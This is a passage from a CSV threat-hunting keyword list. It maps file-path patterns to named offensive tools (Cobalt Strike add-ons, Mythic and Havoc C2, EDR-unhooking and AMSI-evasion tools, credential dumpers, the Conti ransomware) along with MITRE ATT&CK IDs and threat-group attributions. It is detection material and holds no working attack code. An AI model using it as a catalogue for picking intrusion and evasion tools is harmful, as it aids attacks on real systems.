-*/out:spacerunner.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-*/outfile:C:\ProgramData\hashes.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/outflank_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*/outflanknl/*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z
-*/output/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*/output/ratchatPT*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z
-*/ovs-agent-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/OWASP*,offensive_tool_keyword,OWASP,resources and cheat sheet for web attacks techniques,T1190 - T1191 - T1192 - T1210 - T1590 - T1558,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011,N/A,N/A,Web Attacks,https://github.com/OWASP,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/p_cve-2014-9322.tar.gz*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z
-*/p292/Phant0m*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z
-*/p2p-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/package/portscan/*.go,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z
-*/PackMyPayload.git*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 
- TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z
-*/PackMyPayload/*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z
-*/pacu.git*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/padre/pkg/exploit*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z
-*/paensy.cpp*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z
-*/papacat.zip*,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,1,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z
-*/paranoidninja/*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z
-*/parrot/iso/*.iso*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/parrot-mirror/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/parrot-on-docker/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/parrotsec/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/ParsedMalleableData.txt*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z
-*/pass_gen.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*/PassDetective.git*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z
-*/passhash.sl*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z
-*/passive_sqli.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,,
-*/passwd_tracer.c*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z
-*/password.lst*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*/password/mimipenguin/*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z
-*/password_brute.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,,
-*/patchfinder64.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PatchingAPI.cpp*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/PatchingAPI.exe*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/path_traversal.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/path_traversal_win32.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/path-mtu.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/payload_scripts*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/payload_scripts/artifact*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/payload_service.sh*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Payload_Type/athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Payload_Types/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/payload2.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/payloads/DllLdr/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/payloads/payloads.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/payloads/util*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/pcanywhere-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pcworx-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/PDF_Payload/script.txt*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/pe/dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
